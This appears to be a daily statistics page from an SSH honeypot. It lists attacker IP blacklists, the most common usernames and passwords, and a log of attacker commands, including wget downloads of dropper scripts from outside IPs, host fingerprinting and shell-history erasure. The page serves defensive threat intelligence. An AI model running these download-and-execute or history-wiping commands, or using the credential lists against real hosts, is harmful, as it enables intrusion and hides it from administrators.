Honeypot SSH

This page is updated daily. Last update: 2019-01-01 23:02:24 UTC

The followings SSH blacklists (updated every day and in text format) contains IP addresses of hosts which tried to bruteforce into my honeypot located in Italy.
Consider to use Detux to analyze linux malwares on x86, x86-64, ARM, MIPS and MIPSEL cpu architecture.
Monthly SSH login attempts

Attackers blacklists (IP address)

24 hours (txt)week (txt)year (txt)

Statistics - 2019

Unique IP address89
Unique username190
Unique password421

Other informations

Latest files downloaded
All passwords order by length (txt)
All clients version (txt)

Latest commands executed

Timestamp Command Success IP address AS AS Org Country
2019-01-01 19:58:58cd /tmp | | cd /var/run | | cd /mnt | | cd /root | | cd /ok46.101.5.13814061DIGITALOCEAN-ASN DigitalOcean, LLC, USGB
2019-01-01 19:58:58wget http://178.62.71.110/bins.shok46.101.5.13814061DIGITALOCEAN-ASN DigitalOcean, LLC, USGB
2019-01-01 19:58:54cd /tmp | | cd /var/run | | cd /mnt | | cd /root | | cd /ok46.101.5.13814061DIGITALOCEAN-ASN DigitalOcean, LLC, USGB
2019-01-01 19:58:54wget http://178.62.71.110/bins.shok46.101.5.13814061DIGITALOCEAN-ASN DigitalOcean, LLC, USGB
2019-01-01 17:46:33cd /tmp | | cd /var/run | | cd /mnt | | cd /root | | cd /ok46.101.5.13814061DIGITALOCEAN-ASN DigitalOcean, LLC, USGB
2019-01-01 17:46:33wget http://178.62.71.110/bins.shok46.101.5.13814061DIGITALOCEAN-ASN DigitalOcean, LLC, USGB
2019-01-01 16:49:02cat /proc/cpuinfook106.12.81.24538365CNNIC-BAIDU-AP Beijing Ba...UNK
2019-01-01 16:49:01ps -xok106.12.81.24538365CNNIC-BAIDU-AP Beijing Ba...UNK
2019-01-01 16:48:59free -mok106.12.81.24538365CNNIC-BAIDU-AP Beijing Ba...UNK
2019-01-01 16:48:58unameok106.12.81.24538365CNNIC-BAIDU-AP Beijing Ba...UNK

Latest URL

Timestamp URL Shasum - VirusTotal analysis
2019-01-01 20:58:58hxxp://178.62.71.110/bins.sh38f7bb88c9f62bb12f9ab74b779bd1804116eae48bf3c7e29034ce6d199df2ff
2019-01-01 20:58:55hxxp://178.62.71.110/bins.sh38f7bb88c9f62bb12f9ab74b779bd1804116eae48bf3c7e29034ce6d199df2ff
2019-01-01 18:46:34hxxp://178.62.71.110/bins.sh38f7bb88c9f62bb12f9ab74b779bd1804116eae48bf3c7e29034ce6d199df2ff
2019-01-01 17:16:09hxxp://142.93.163.129/8UsA.shf8e360bbf3893bd4508cfd3445f2d5517464d150931c3857f14bbbf0725afa92
2019-01-01 17:16:09hxxp://142.93.163.129/8UsA.shf8e360bbf3893bd4508cfd3445f2d5517464d150931c3857f14bbbf0725afa92
2019-01-01 17:07:24hxxp://142.93.163.129/8UsA.shf8e360bbf3893bd4508cfd3445f2d5517464d150931c3857f14bbbf0725afa92
2019-01-01 17:07:24hxxp://142.93.163.129/8UsA.shf8e360bbf3893bd4508cfd3445f2d5517464d150931c3857f14bbbf0725afa92
2019-01-01 12:00:58hxxp://35.227.55.119/bins.sh9316b6583c781ceb7195ca8b8ecf85493eb2402d9cdef8fa1685fd5e2ab5ad0f
2018-12-30 18:23:13hxxp://142.11.216.61/8UsA.sh10057669803252d81668efa171787bad1f366b9a82028b34fcb588f74c43c201
2018-12-30 18:23:10hxxp://142.11.216.61/8UsA.sh10057669803252d81668efa171787bad1f366b9a82028b34fcb588f74c43c201

Latest VirusTotal analysis

Datetime Filename (shasum) - VirusTotal analysis Virustotal scan date Virustotal results File type File size
2019-01-0238f7bb88c9f62bb12f9ab74b779bd1804116eae48bf3c7e29034ce6d199df2ff-0/0Bourne-Again shell script, ASCII text executable1.8K
2019-01-02f8e360bbf3893bd4508cfd3445f2d5517464d150931c3857f14bbbf0725afa92-0/0Bourne-Again shell script, ASCII text executable2.0K
2018-12-3110057669803252d81668efa171787bad1f366b9a82028b34fcb588f74c43c201-0/0Bourne-Again shell script, ASCII text executable1.9K
2018-12-31024c6d261246e27b2918182ed0f218cb522277ed6985cad08ef2c25dab9c6c22-0/0Bourne-Again shell script, ASCII text executable1.9K
2018-12-309913abb58d8229c08cd296dba05d2b2537fdf31946871744e91fd5be44b51228-0/0Bourne-Again shell script, ASCII text executable1.8K
2018-12-30931310ff0c6182d2db47199cb3ff2bed6ab68fe69c8c3fc64698026768cf1d36-0/0ASCII text2.1K
2018-12-30f4547555854921023b39dbb4fd8878161e814944bcbd906818cdef2cdc12d3a0-0/0Bourne-Again shell script, ASCII text executable1.8K
2018-12-30e40340560688e197d080cac679b49b9903407eff4bdf5d9680467927aa2e8d16-0/0Bourne-Again shell script, ASCII text executable1.9K
2018-12-290799fcfdc322332908349029f1b4dc4b5ec413f7b08b47d9dc0849c005198298-0/0Bourne-Again shell script, ASCII text executable2.0K
2018-12-2945d6f0241c08a54820ba3391dba06bf06d2ddcc72155f4af9b68565220fca1d6-0/0Bourne-Again shell script, ASCII text executable1.8K

Top most sessions per distinct IP address - 2019

IP Address AS AS Org Country
5.188.87.52 (virustotal) (dnsbl-check)57172GLOBALLAYER, NLRU
5.188.87.49 (virustotal) (dnsbl-check)57172GLOBALLAYER, NLRU
109.248.9.105 (virustotal) (dnsbl-check)58222SOLAR-AS, GBRU
109.248.9.103 (virustotal) (dnsbl-check)58222SOLAR-AS, GBRU
5.188.86.211 (virustotal) (dnsbl-check)49453GLOBALLAYER, NLRU
5.188.87.51 (virustotal) (dnsbl-check)57172GLOBALLAYER, NLRU
5.188.87.54 (virustotal) (dnsbl-check)57172GLOBALLAYER, NLRU
175.111.117.218 (virustotal) (dnsbl-check)46026BBT-AS-ID BATAM BINTAN TE...ID
5.188.87.55 (virustotal) (dnsbl-check)57172GLOBALLAYER, NLRU
5.188.87.53 (virustotal) (dnsbl-check)57172GLOBALLAYER, NLRU

Login attempts last 10 days

Date Occurrences
2019-01-0243
2019-01-014671
2018-12-314144
2018-12-304775
2018-12-292563
2018-12-28703
2018-12-264028
2018-12-254049
2018-12-244588
2018-12-235009

Top username - 2019

Username
root
admin
nagios
user
test
git
1234
ubnt
ftpuser
support

Top password - 2019

Password
root
123456
nagios
admin
1234
password
ubnt
123
user
default

Top username/password - 2019

Username / Password
root / root
nagios / nagios
admin / admin
ubnt / ubnt
user / user
root / 123456
root / admin
admin / password
support / support
admin / 123456

Top commands - 2019

Command
cd /tmp | | cd /var/run | | cd /mnt | | cd /root | | cd /
wget http://178.62.71.110/bins.sh
cd /tmp
echo '' > DIRTEST | | cd /var
echo '' > DIRTEST
wget http://142.93.163.129/8UsA.sh
wget http://35.227.55.119/bins.sh
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null

Top tunnelling port - 2019

Port #

Top tunnelling IP address - 2019

IP address DNS AS AS Org Country #
ya.ru (virustotal) (dnsbl-check)n/a--UNK2238
104.108.66.58 (virustotal) (dnsbl-check)a104-108-66-58.deploy.static.akamaitechnologies.com16625AKAMAI-AS Akamai Technologies, Inc., USUS228
65.55.33.119 (virustotal) (dnsbl-check)n/a8075MICROSOFT-CORP-MSN-AS-BLO...US138
65.55.92.152 (virustotal) (dnsbl-check)n/a8075MICROSOFT-CORP-MSN-AS-BLO...US106
192.108.239.107 (virustotal) (dnsbl-check)video-weaver.ams02.hls.ttvnw.net46489JUSTINTV Twitch Interactive Inc., USUS98
207.46.8.167 (virustotal) (dnsbl-check)bay0-mc5-f.bay0.hotmail.com8075MICROSOFT-CORP-MSN-AS-BLO...US93
registrace.seznam.cz (virustotal) (dnsbl-check)bay0-mc5-f.bay0.hotmail.com--UNK91
66.196.118.35 (virustotal) (dnsbl-check)UNKNOWN-66-196-118-X.yahoo.com26101YAHOO-3 Yahoo!, USUS82
66.196.118.33 (virustotal) (dnsbl-check)UNKNOWN-66-196-118-X.yahoo.com26101YAHOO-3 Yahoo!, USUS76
65.55.92.136 (virustotal) (dnsbl-check)mx1.hotmail.com8075MICROSOFT-CORP-MSN-AS-BLO...US74